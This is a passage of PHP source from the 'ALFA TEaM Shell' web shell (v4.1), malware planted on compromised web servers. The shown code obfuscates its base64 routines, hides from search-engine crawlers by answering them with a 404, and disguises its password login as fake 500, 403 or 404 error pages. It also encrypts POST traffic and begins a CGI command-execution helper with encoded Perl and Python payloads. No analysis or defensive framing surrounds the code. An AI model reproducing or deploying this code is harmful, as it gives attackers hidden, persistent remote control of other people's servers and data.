$i++, 1));\r\n            $enc3 = strpos($keyStr, substr($input, $i++, 1));\r\n            $enc4 = strpos($keyStr, substr($input, $i++, 1));\r\n            $chr1 = ($enc1 << 2) | ($enc2 >> 4);\r\n            $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);\r\n            $chr3 = (($enc3 & 3) << 6) | $enc4;\r\n            $output = $output . chr((int)$chr1);\r\n            if ($enc3 != 64)\r\n            {\r\n                $output = $output . chr((int)$chr2);\r\n            }\r\n            if ($enc4 != 64)\r\n            {\r\n                $output = $output . chr((int)$chr3);\r\n            }\r\n            $chr1 = $chr2 = $chr3 = "";\r\n            $enc1 = $enc2 = $enc3 = $enc4 = "";\r\n        }\r\n        while ($i < strlen($input));\r\n        return $output;\r\n    }\r\n}\r\nelse\r\n{\r\n    function zRtSHsbTzV($s)\r\n    {\r\n        $b = \'b\' . \'a\' . \'se\' . \'6\' . \'4\' . \'_d\' . \'ecod\' . \'e\' . \'\';\r\n        return $b($s);\r\n    }\r\n}\r\n\r\nfunction __ZW5jb2Rlcg($s)\r\n{\r\n    return vcnvSCZgBz($s);\r\n}\r\nfunction __ZGVjb2Rlcg($s)\r\n{\r\n    return zRtSHsbTzV($s);\r\n}\r\n\r\n$GLOBALS[\'DB_NAME\'] = $GLOBALS[\'oZgNypoPRU\'];\r\n\r\nforeach ($GLOBALS[\'DB_NAME\'] as $key => $value)\r\n{\r\n\t$prefix = substr($key, 0, 2);\r\n\tif ($prefix == "us")\r\n\t{\r\n\t\t$GLOBALS[\'DB_NAME\']["user"] = $value;\r\n\t\t$GLOBALS[\'DB_NAME\']["user_rand"] = $key;\r\n\t}\r\n\telseif ($prefix == "pa")\r\n\t{\r\n\t\t$GLOBALS[\'DB_NAME\']["pass"] = $value;\r\n\t\t$GLOBALS[\'DB_NAME\']["pass_rand"] = $key;\r\n\t}\r\n\telseif ($prefix == "sa")\r\n\t{\r\n\t\t$GLOBALS[\'DB_NAME\']["safemode"] = $value;\r\n\t\t$GLOBALS[\'DB_NAME\']["safemode_rand"] = $key;\r\n\t}\r\n\telseif ($prefix == "lo")\r\n\t{\r\n\t\t$GLOBALS[\'DB_NAME\']["login_page"] = $value;\r\n\t\t$GLOBALS[\'DB_NAME\']["login_page_rand"] = $key;\r\n\t}\r\n\telseif ($prefix == "sh")\r\n\t{\r\n\t\t$GLOBALS[\'DB_NAME\']["show_icons"] = $value;\r\n\t\t$GLOBALS[\'DB_NAME\']["show_icons_rand"] = $key;\r\n\t}\r\n\telseif ($prefix == "po")\r\n\t{\r\n\t\t$GLOBALS[\'DB_NAME\']["post_encryption"] = $value;\r\n\t\t$GLOBALS[\'DB_NAME\']["post_encryption_rand"] = $key;\r\n\t}\r\n\telseif ($prefix == "cg")\r\n\t{\r\n\t\t$GLOBALS[\'DB_NAME\']["cgi_api"] = $value;\r\n\t\t$GLOBALS[\'DB_NAME\']["cgi_api_rand"] = $key;\r\n\t}\r\n}\r\n\r\nunset($GLOBALS[\'oZgNypoPRU\']);\r\n\r\nif (!isset($_SERVER["HTTP_HOST"])) exit();\r\n\r\nif(!empty($_SERVER[\'HTTP_USER_AGENT\'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match(\'/\'.implode(\'|\',$userAgents).\'/i\',$_SERVER[\'HTTP_USER_AGENT\'])){header(\'HTTP/1.0 404 Not Found\');exit;}}\r\nif(!isset($GLOBALS[\'DB_NAME\'][\'user\']))exit(\'$GLOBALS[\\\'DB_NAME\\\'][\\\'user\\\']\');\r\nif(!isset($GLOBALS[\'DB_NAME\'][\'pass\']))exit(\'$GLOBALS[\\\'DB_NAME\\\'][\\\'pass\\\']\');\r\nif(!isset($GLOBALS[\'DB_NAME\'][\'safemode\']))exit(\'$GLOBALS[\\\'DB_NAME\\\'][\\\'safemode\\\']\');\r\nif(!isset($GLOBALS[\'DB_NAME\'][\'login_page\']))exit(\'$GLOBALS[\\\'DB_NAME\\\'][\\\'login_page\\\']\');\r\nif(!isset($GLOBALS[\'DB_NAME\'][\'show_icons\']))exit(\'$GLOBALS[\\\'DB_NAME\\\'][\\\'show_icons\\\']\');\r\nif(!isset($GLOBALS[\'DB_NAME\'][\'post_encryption\']))exit(\'$GLOBALS[\\\'DB_NAME\\\'][\\\'post_encryption\\\']\');\r\ndefine("__ALFA_VERSION__", "4.1");\r\ndefine("__ALFA_UPDATE__", "2");\r\ndefine("__ALFA_CODE_NAME__", "Tesla");\r\ndefine("__ALFA_DATA_FOLDER__", "ALFA_DATA");\r\ndefine("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));\r\ndefine("__ALFA_SECRET_KEY__", __ALFA_POST_ENCRYPTION__?_AlfaSecretKey():\'\');\r\n$GLOBALS[\'__ALFA_COLOR__\'] = array(\r\n\t\t"shell_border" => array(\r\n\t\t\t"key_color" => "#0E304A",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".header" => "border: 7px solid {color}",\r\n\t\t\t\t"#meunlist" => "border-color: {color}",\r\n\t\t\t\t"#hidden_sh" => "background-color: {color}",\r\n\t\t\t\t".ajaxarea" => "border: 1px solid {color}",\r\n\t\t\t\t".foot" => "border-color: {color}",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"header_vars" => "#27979B",\r\n\t\t"header_values" => "#67ABDF",\r\n\t\t"header_on" => "#00FF00",\r\n\t\t"header_off" => "#ff0000",\r\n\t\t"header_none" => "#00FF00",\r\n\t\t"home_shell" => "#ff0000",\r\n\t\t"home_shell:hover" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".home_shell:hover" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"back_shell" => "#efbe73",\r\n\t\t"back_shell:hover" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".back_shell:hover" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"header_pwd" => "#00FF00",\r\n\t\t"header_pwd:hover" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".header_pwd:hover" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"header_drive" => "#00FF00",\r\n\t\t"header_drive:hover" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".header_drive:hover" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"header_show_all" => "#00FF00",\r\n\t\t"disable_functions" => "#ff0000",\r\n\t\t"footer_text" => "#27979B",\r\n\t\t"menu_options" => "#27979B",\r\n\t\t"menu_options:hover" => array(\r\n\t\t\t"key_color" => "#646464",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".menu_options:hover" => "background-color: {color};font-weight: unset;",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"options_list" => array(\r\n\t\t\t"key_color" => "#00FF00",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".content_options_holder .header center a" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"options_list:hover" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".content_options_holder .header center a:hover" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"options_list_header" => array(\r\n\t\t\t"key_color" => "#59cc33",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".txtfont_header" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"options_list_text" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".txtfont,.tbltxt" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"Alfa+" => array(\r\n\t\t\t"key_color" => "#06ff0f",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".alfa_plus" => "color: {color};font-weight: unset;",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"hidden_shell_text" => array(\r\n\t\t\t"key_color" => "#00FF00",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"#hidden_sh a" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"hidden_shell_version" => "#ff0000",\r\n\t\t"shell_name" => "#FF0000",\r\n\t\t"main_row:hover" => array(\r\n\t\t\t"key_color" => "#646464",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".main tr:hover" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"main_header" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".main th" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"main_name" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".main .main_name" => "color: {color};font-weight: unset;",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"main_size" => "#67ABDF",\r\n\t\t"main_modify" => "#67ABDF",\r\n\t\t"main_owner_group" => "#67ABDF",\r\n\t\t"main_green_perm" => "#25ff00",\r\n\t\t"main_red_perm" => "#FF0000",\r\n\t\t"main_white_perm" => "#FFFFFF",\r\n\t\t"beetween_perms" => "#FFFFFF",\r\n\t\t"main_actions" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".main .actions" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"menu_options:hover" => array(\r\n\t\t\t"key_color" => "#646464",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".menu_options:hover" => "background-color: {color};font-weight: unset;",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"minimize_editor_background" => array(\r\n\t\t\t"key_color" => "#0e304a",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".minimized-wrapper" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"minimize_editor_text" => array(\r\n\t\t\t"key_color" => "#f5deb3",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".minimized-text" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_border" => array(\r\n\t\t\t"key_color" => "#0e304a",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".editor-explorer,.editor-modal" => "border: 2px solid {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_background" => array(\r\n\t\t\t"key_color" => "rgba(0, 1, 23, 0.94)",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".editor-explorer,.editor-modal" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_header_background" => array(\r\n\t\t\t"key_color" => "rgba(21, 66, 88, 0.93)",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".editor-header" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_header_text" => array(\r\n\t\t\t"key_color" => "#00ff7f",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".editor-path" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_header_button" => array(\r\n\t\t\t"key_color" => "#1d5673",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".close-button, .editor-minimize" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_actions" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".editor_actions" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_file_info_vars" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".editor_file_info_vars" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_file_info_values" => array(\r\n\t\t\t"key_color" => "#67ABDF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".filestools" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_history_header" => array(\r\n\t\t\t"key_color" => "#14ff07",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".hheader-text,.history-clear" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_history_list" => array(\r\n\t\t\t"key_color" => "#03b3a3",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".editor-file-name" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_history_selected_file" => array(\r\n\t\t\t"key_color" => "rgba(49, 55, 93, 0.77)",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".is_active" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_history_file:hover" => array(\r\n\t\t\t"key_color" => "#646464",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".file-holder > .history:hover" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"input_box_border" => array(\r\n\t\t\t"key_color" => "#0E304A",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"input[type=text],textarea" => "border: 1px solid {color}",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"input_box_text" => array(\r\n\t\t\t"key_color" => "#999999",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"input[type=text],textarea" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"input_box:hover" => array(\r\n\t\t\t"key_color" => "#27979B",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"select_box_border" => array(\r\n\t\t\t"key_color" => "#0E304A",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"select" => "border: 1px solid {color}",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"select_box_text" => array(\r\n\t\t\t"key_color" => "#FFFFEE",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"select" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"select_box:hover" => array(\r\n\t\t\t"key_color" => "#27979B",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"button_border" => array(\r\n\t\t\t"key_color" => "#27979B",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"input[type=submit],.button,#addup" => "border: 1px solid {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"button:hover" => array(\r\n\t\t\t"key_color" => "#27979B",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",\r\n\t\t\t\t".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"outputs_text" => array(\r\n\t\t\t"key_color" => "#67ABDF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".ml1" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"outputs_border" => array(\r\n\t\t\t"key_color" => "#0E304A",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".ml1" => "border: 1px solid {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"uploader_border" => array(\r\n\t\t\t"key_color" => "#0E304A",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"uploader_background" => array(\r\n\t\t\t"key_color" => "#0E304A",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".inputfile strong" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"uploader_text_right" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".inputfile strong" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"uploader_text_left" => array(\r\n\t\t\t"key_color" => "#25ff00",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".inputfile span" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"uploader:hover" => array(\r\n\t\t\t"key_color" => "#27979B",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"uploader_progress_bar" => array(\r\n\t\t\t"key_color" => "#00ff00",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".up_bar" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"mysql_tables" => "#00FF00",\r\n\t\t"mysql_table_count" => "#67ABDF",\r\n\t\t"copyright" => "#dfff00",\r\n\t\t"scrollbar" => array(\r\n\t\t\t"key_color" => "#1e82b5",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"*::-webkit-scrollbar-thumb" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"scrollbar_background" => array(\r\n\t\t\t"key_color" => "#000115",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"*::-webkit-scrollbar-track" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n);\r\n$GLOBALS[\'__file_path\'] = str_replace(\'\\\\\',\'/\',trim(preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__)));\r\n$config = array(\'AlfaUser\' => $GLOBALS[\'DB_NAME\'][\'user\'],\'AlfaPass\' => $GLOBALS[\'DB_NAME\'][\'pass\'],\'AlfaProtectShell\' => $GLOBALS[\'DB_NAME\'][\'safemode\'],\'AlfaLoginPage\' => $GLOBALS[\'DB_NAME\'][\'login_page\']);\r\n//@session_start();\r\n@session_write_close();\r\n@ignore_user_abort(true);\r\n@set_time_limit(0);\r\n@ini_set(\'memory_limit\', \'-1\');\r\n@ini_set("upload_max_filesize", "9999m");\r\nif($config[\'AlfaProtectShell\']){\r\n$SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:"");\r\n$Eform=\'<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>\';\r\nif($config[\'AlfaLoginPage\'] == \'gui\'){\r\nif(@$_COOKIE["AlfaUser"] != $config[\'AlfaUser\'] && $_COOKIE["AlfaPass"] != md5($config[\'AlfaPass\'])){\r\nif(@$_POST["usrname"]==$config[\'AlfaUser\'] && @md5($_POST["password"])==$config[\'AlfaPass\']){\r\n__alfa_set_cookie("AlfaUser", $config[\'AlfaUser\']);\r\n__alfa_set_cookie("AlfaPass", @md5($config[\'AlfaPass\']));\r\n@header(\'location: \'.$_SERVER["PHP_SELF"]);\r\n}\r\necho \'\r\n<style>\r\nbody{background: black;}\r\n#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }\r\n#loginbox td { border-radius:5px; font-size:11px; }\r\n</style>\r\n<title>~ ALFA TEaM Shell-v\'.__ALFA_VERSION__.\'-\'.__ALFA_CODE_NAME__.\' ~</title><center>\r\n<center><img style="border-radius:100px;" width="500" height="250" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png" /></center>\r\n<div id=loginbox><p><font face="verdana,arial" size=-1>\r\n<center><table cellpadding=\\\'2\\\' cellspacing=\\\'0\\\' border=\\\'0\\\' id=\\\'ap_table\\\'>\r\n<tr><td bgcolor="green"><table cellpadding=\\\'0\\\' cellspacing=\\\'0\\\' border=\\\'0\\\' width=\\\'100%\\\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM Shell-v\'.__ALFA_VERSION__.\'-\'.__ALFA_CODE_NAME__.\' ~</b></font></th></tr>\r\n<tr><td bgcolor="black" style="padding:5">\r\n<form method="post">\r\n<input type="hidden" name="action" value="login">\r\n<input type="hidden" name="hide" value="">\r\n<center><table>\r\n<tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \\\'username\\\'){this.value = \\\'\\\';}"></td></tr>\r\n<tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \\\'password\\\') this.value = \\\'\\\';"></td></tr>\r\n<tr><td><font face="verdana,arial" size=-1>&nbsp;</font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>\r\n</div><br /></center>\';\r\nexit;\r\n}\r\n}elseif($config[\'AlfaLoginPage\']==\'500\'){\r\nif(@$_COOKIE["AlfaPass"] != @md5($config[\'AlfaPass\'])){\r\nif(@md5($_POST["password"])==$config[\'AlfaPass\']){\r\n__alfa_set_cookie("AlfaUser", $config[\'AlfaUser\']);\r\n__alfa_set_cookie("AlfaPass", @md5($config[\'AlfaPass\']));\r\n@header(\'location: \'.$_SERVER["PHP_SELF"]);\r\n}\r\necho \'<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, \'.$_SERVER[\'SERVER_ADMIN\'].\' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>\'.$SERVER_SIG.\'</body></html>\'.$Eform;\r\nexit;\r\n}\r\n}elseif($config[\'AlfaLoginPage\']==\'403\'){\r\nif(@$_COOKIE["AlfaPass"] != @md5($config[\'AlfaPass\'])){\r\nif(@md5($_POST["password"])==$config[\'AlfaPass\']){\r\n__alfa_set_cookie("AlfaUser", $config[\'AlfaUser\']);\r\n__alfa_set_cookie("AlfaPass", @md5($config[\'AlfaPass\']));\r\n@header(\'location: \'.$_SERVER["PHP_SELF"]);\r\n}\r\necho "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don\'t have permission to access ".$_SERVER[\'PHP_SELF\']." on this server.</p><hr>".$SERVER_SIG."</body></html>".$Eform;\r\nexit;\r\n}\r\n}elseif($config[\'AlfaLoginPage\']==\'404\'){\r\nif(@$_COOKIE["AlfaPass"] != @md5($config[\'AlfaPass\'])){\r\nif(@md5($_POST["password"])==$config[\'AlfaPass\']){\r\n__alfa_set_cookie("AlfaUser", $config[\'AlfaUser\']);\r\n__alfa_set_cookie("AlfaPass", @md5($config[\'AlfaPass\']));\r\n@header(\'location: \'.$_SERVER["PHP_SELF"]);\r\n}\r\necho "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER[\'PHP_SELF\']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>".$SERVER_SIG."</body></html>".$Eform;\r\nexit;\r\n}\r\n}\r\n}\r\nfunction decrypt_post($str){\r\n\tif(__ALFA_POST_ENCRYPTION__){\r\n\t\t$pwd = __ALFA_SECRET_KEY__;\r\n\t\t$pwd     = __ZW5jb2Rlcg($pwd);\r\n\t\t$str     = __ZGVjb2Rlcg($str);\r\n\t\t$enc_chr = "";\r\n\t\t$enc_str = "";\r\n\t\t$i       = 0;\r\n\t\twhile ($i < strlen($str)) {\r\n\t\t\tfor ($j = 0; $j < strlen($pwd); $j++) {\r\n\t\t\t\t$enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));\r\n\t\t\t\t$enc_str .= $enc_chr;\r\n\t\t\t\t$i++;\r\n\t\t\t\tif ($i >= strlen($str))\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t\treturn __ZGVjb2Rlcg($enc_str);\r\n\t}else{\r\n\t\treturn __ZGVjb2Rlcg($str);\r\n\t}\r\n}\r\n\r\nfunction _AlfaSecretKey(){\r\n\t$secret = @$_COOKIE["AlfaSecretKey"];\r\n\tif(!isset($_COOKIE["AlfaSecretKey"])){\r\n\t\t$secret = uniqid(mt_rand(), true);\r\n\t\t__alfa_set_cookie("AlfaSecretKey", $secret);\r\n\t}\r\n\treturn $secret;\r\n}\r\nfunction alfa_getColor($target){\r\n\tif(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){\r\n\t\treturn $GLOBALS["DB_NAME"]["color"][$target];\r\n\t}else{\r\n\t\t$target = $GLOBALS["__ALFA_COLOR__"][$target];\r\n\t\tif(is_array($target)){\r\n\t\t\treturn $target["key_color"];\r\n\t\t}else{\r\n\t\t\treturn $target;\r\n\t\t}\r\n\t}\r\n}\r\nfunction alfaCssLoadColors(){\r\n\t$css = "";\r\n\tforeach($GLOBALS[\'__ALFA_COLOR__\'] as $key => $value){\r\n\t\tif(!is_array($value)){\r\n\t\t\t$value = alfa_getColor($key);\r\n\t\t\t$css .= ".{$key}{color: {$value};}";\r\n\t\t}else{\r\n\t\t\tif(isset($value["multi_selector"])){\r\n\t\t\t\tforeach($value["multi_selector"] as $k => $v){\r\n\t\t\t\t\t$color = alfa_getColor($key);\r\n\t\t\t\t\t$code = str_replace("{color}", $color, $v);\r\n\t\t\t\t\t$css .=  $k."{".$code."}";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\treturn $css;\r\n}\r\nif(isset($_POST[\'ajax\'])){\r\nfunction AlfaNum(){\r\n$args = func_get_args();\r\n$alfax = array();\r\n$find = array();\r\nfor($i=1;$i<=10;$i++){\r\n$alfax[] = $i;\r\n}\r\nforeach($args as $arg){\r\n$find[] = $arg;\r\n}\r\necho \'<script>\';\r\nforeach($alfax as $alfa){\r\nif(in_array($alfa,$find))\r\ncontinue;\r\necho \'alfa\'.$alfa."_=";\r\n}\r\necho \'""</script>\';\r\n}}\r\nfunction _alfa_cgicmd($cmd,$lang="perl",$set_cookie=false){\r\n\tif(!$GLOBALS["DB_NAME"]["cgi_api"]){\r\n\t\treturn "";\r\n\t}\r\n\tif(isset($_COOKIE["alfacgiapi_mode"])){\r\n\t\treturn "";\r\n\t}\r\n\t$cmd_pure = $cmd;\r\n\t$is_curl = function_exists(\'curl_version\');\r\n\t$is_socket = function_exists(\'fsockopen\');\r\n\tif($is_curl||$is_socket){\r\n\t\t$recreate = false;\r\n\t\tif(isset($_COOKIE["alfacgiapi"])){\r\n\t\t\tif(!@file_exists("alfacgiapi/".$_COOKIE["alfacgiapi"].".alfa")){\r\n\t\t\t\t$recreate = true;\r\n\t\t\t\t$lang = $_COOKIE["alfacgiapi"];\r\n\t\t\t}\r\n\t\t}\r\n\t\tif(!isset($_COOKIE["alfacgiapi"])||$recreate){\r\n\t\t\t@chdir(dirname($_SERVER["SCRIPT_FILENAME"]));\r\n\t\t\t$perl = \'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=\';\r\n\t\t\t$py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";\r\n\t\t\t$bash = 